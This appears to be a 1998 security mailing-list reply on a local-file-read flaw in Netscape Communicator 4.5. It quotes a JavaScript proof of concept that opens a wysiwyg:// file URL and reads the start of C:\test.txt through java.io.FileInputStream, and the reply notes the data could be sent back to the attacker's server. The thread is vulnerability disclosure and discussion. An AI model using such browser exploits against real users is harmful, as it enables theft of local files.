Re: Netscape Communicator 4.5 can read local files

[andrew () squiz co nz (Andrew McNaughton)]

The demonstration exploit puts your file on screen, but could as easily
have passed it back to the server the javascript came from.  simply
replace alert(b) with appropriate code.

Andrew McNaughton



On Mon, 23 Nov 1998, Bill Lavalette wrote:

> Hi -
> this appears to be no different then typing c:\ in the location of any
> browser  hardly a security hole in my opinion the test site did not
> prove that this is a potential or current problem.
>
> > The Javascript code is:
> >
> > sl=window.open("wysiwyg://1/file:///C|/");
> > sl2=sl.window.open();
> > sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your
> > file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new
> > java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) &&
> > (i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";